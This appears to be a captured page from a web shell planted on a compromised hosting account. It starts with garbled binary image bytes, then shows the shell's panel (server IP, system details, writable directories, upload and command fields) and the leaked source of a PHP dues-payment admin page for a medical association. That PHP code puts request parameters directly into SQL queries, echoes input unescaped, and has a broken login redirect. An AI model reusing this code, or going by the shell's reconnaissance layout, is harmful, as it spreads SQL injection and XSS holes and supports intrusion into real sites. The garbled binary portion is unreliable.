JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 2.57.91.208  /  Your IP : 216.73.217.31
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/prosesnon.php
<?php  include "header.php";
	// cek apakah yang mengakses halaman ini sudah login
	if($_SESSION['status']<>"login"){
		header("location:location:../login.php");
	}
?>

<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">
<head>
    <title>IDI Kota Bandung</title>
    <!-- Custom fonts for this template-->
  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">

  <!-- Custom styles for this template-->
  <link href="css/sb-admin-2.min.css" rel="stylesheet">
  
  <!-- Custom styles for this page -->
  <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">

<style type="text/css">
<!--
.style2 {
	font-size: 12px;
	font-weight: bold;
}
.style3 {font-size: 12px}
-->

@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);

html{    
  background-size: cover;
  height:100%;
}

#feedback-page{
	text-align:center;
}

#form-main{
	width:100%;
	float:left;
	padding-top:0px;
}

#form-div {
	background-color:rgba(72,72,72,0.4);
	padding-left:35px;
	padding-right:35px;
	padding-top:35px;
	padding-bottom:50px;
	width: 800px;
	float: left;
	left: 50%;

  margin-top:30px;
	margin-left: 100px;
  -moz-border-radius: 7px;
  -webkit-border-radius: 7px;
}

.feedback-input {
	color:#3c3c3c;
	font-family: Helvetica, Arial, sans-serif;
  font-weight:500;
	font-size: 18px;
	border-radius: 0;
	line-height: 22px;
	background-color: #fbfbfb;
	padding: 13px 13px 13px 54px;
	margin-bottom: 10px;
	width:100%;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
  border: 3px solid rgba(0,0,0,0);
}

.feedback-input:focus{
	background: #fff;
	box-shadow: 0;
	border: 3px solid #3498db;
	color: #3498db;
	outline: none;
  padding: 13px 13px 13px 54px;
}

.focused{
	color:#30aed6;
	border:#30aed6 solid 3px;
}

/* Icons ---------------------------------- */
#name{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#name:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 8px 5px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#comment{
	background-image: url(http://rexkirby.com/kirbyandson/images/comment.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

textarea {
    width: 100%;
    height: 150px;
    line-height: 150%;
    resize:vertical;
}

input:hover, textarea:hover,
input:focus, textarea:focus {
	background-color:white;
}

#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:left;
	width: 100%;
	border: #fbfbfb solid 4px;
	cursor:pointer;
	background-color: #3498db;
	color:white;
	font-size:24px;
	padding-top:22px;
	padding-bottom:22px;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
  margin-top:-4px;
  font-weight:700;
}

#button-blue:hover{
	background-color: rgba(0,0,0,0);
	color: #0493bd;
}
	
.submit:hover {
	color: #3498db;
}
	
.ease {
	width: 0px;
	height: 74px;
	background-color: #fbfbfb;
	-webkit-transition: .3s ease;
	-moz-transition: .3s ease;
	-o-transition: .3s ease;
	-ms-transition: .3s ease;
	transition: .3s ease;
}

.submit:hover .ease{
  width:100%;
  background-color:white;
}

@media only screen and (max-width: 580px) {
	#form-div{
		left: 3%;
		margin-right: 3%;
		width: 88%;
		margin-left: 0;
		padding-left: 3%;
		padding-right: 3%;
	}
</style>

<?php
	$noinv=$_GET['noinv'];
$npm = $_GET['npm'];
$sqlEdit = mysqli_query($konek, "SELECT * FROM b_inv where validasi ='' AND  noinv='$noinv'");
$e=mysqli_fetch_array($sqlEdit);
$tglBayar 	= date('Y-m-d');
//$bulan	=$e['bulan']; 
$nis	=$e['npm']; 
//$tkelas	=$e['kelas']; 
?>

</form>
<!-- proses edit data -->
  <div id="form-main">
  <div id="form-div" class="px-3 py-5 bg-gradient-info text-white">

  
    <div class="card-body">
                  <div class="row">
                  <div class="col-md-6">
                  <div class="form-group ">   
 
                  
                  
   <form method="post" action="" enctype="multipart/form-data">

        <p class="name"><input name="perihal" readonly class="form-control"  value="bayar_iuran"  />
      </p>
	   <p class="name"><input name="npm" readonly class="form-control"  value="<?php echo $_GET['npm']; ?>"  />
      </p>
	  
       <label for="tbayar">Tanggal Konfirmasi</label><br>
        <input name="tbayar" readonly class="form-control" value="<?php echo $tglBayar  ?>" />
      </p>
	  
              <label for="tbayar">Tanggal Awal iuran</label><br>
        <input name="tglawal" readonly class="form-control" value="<?php echo $e['tgl_awal']; ?>" />
      </p>
					  
  	         <label for="tbayar">Tanggal akhir iuran</label><br>
        <input name="tglakhir" readonly class="form-control" value="<?php echo $e['tgl_akhir']; ?>" />
      </p>
	<?php  
					  
		$awaliur1=		$e['tgl_awal'];	  
		$akhiriur1	=	$e['tgl_akhir'];	  
   $timeStart = strtotime("$awaliur1");
							$timeEnd = strtotime("$akhiriur1");
							// Menambah bulan ini + semua bulan pada tahun sebelumnya
							$numBulan = 1 + (date("Y",$timeEnd)-date("Y",$timeStart))*12;
							// menghitung selisih bulan
							$numBulan += date("m",$timeEnd)-date("m",$timeStart);
			?>		  
  
      <label for="bayar" class="merah" >Periode Bulan<br>
         <input name="periode" type="text" class="form-control" readonly   value="<?php echo $numBulan ?>" placeholder="Isi Periode Bulan" maxlength="30" required />
      </p>			  
			
  
  </div>
  </div>
                 
 <div class="col-md-6">
                  <div class="form-group"> 	 

	 
	  

<!--	  
    <label for="jumlah" class="form-control" class="merah">Bayar untuk periode</label>
      <br>
   						<select name="periode">
						    <option value="5">5 Tahun</option>
							<option value="1">1 Tahun</option>
							<option value="2">2 Tahun </option>
							<option value="3">3 Tahun</option>
							<option value="4">4 Tahun</option>
							
                 </select>
  </p> -->
	     <label for="jumlah">Total Iuran IDR</label><br>
        <input name="nominal" readonly class="form-control"   value="<?php echo $e['nominal']; ?>" />
      </p>
	  
				  
					  
       <label for="bayar" class="merah" >Jumlah Transfer /Sisa Iuran IDR</label><br>
         <input name="nombayar" type="text" class="form-control"   value="<?php echo $e['nominal']; ?>" placeholder="IsiNominal jumlah transfer" maxlength="30" required />
      </p>
      
	 
</p>
        <p>&nbsp;          </p>
        <div class="submit">
        <input type="submit"   id="button-blue" value="Submit" />
        <div class="ease"></div>
      </div>
    </form>
  </div>
</div>

<?php
if($_SERVER['REQUEST_METHOD']=='POST'){

	//variabel untuk menampung inputan dari form
	
	
	//$id 	    = $_POST['id'];
	$npm	    = $_POST['npm'];
	$tbayar 	= $_POST['tbayar'];
	$nominal 	= $_POST['nominal'];
	$nombayar 	= $_POST['nombayar'];
	$bukti 	    = $_POST['bukti'];
	$periode 	= $_POST['periode'];
    $tglawal 	= $_POST['tglawal'];
	$tglakhir 	= $_POST['tglakhir'];
	$perihal 	= $_POST['perihal'];
  //  $npa	    = $_POST['npa'];
 
  

				    $update = mysqli_query($konek, "UPDATE h_anggota SET tunggakan='bayar' WHERE npm='$npm'");

					$update = mysqli_query($konek, "UPDATE b_inv SET 
													tgl_bayar='$tbayar',
													status='bayar',
													periode='$periode',
													tgliuran='$tglakhir',
													tgl_awal='$tglawal',
													tgl_akhir='$tglakhir',
													perihal='$perihal',
													
													bayar ='$nombayar'
													WHERE npm='$npm' ");
		
					echo "<script> document.location.href='bukti_iuran.php?npm=$npm&noinv=$noinv'; </script>";
				}
	//}
//}
?>


Youez - 2016 - github.com/yon3zu
LinuXploit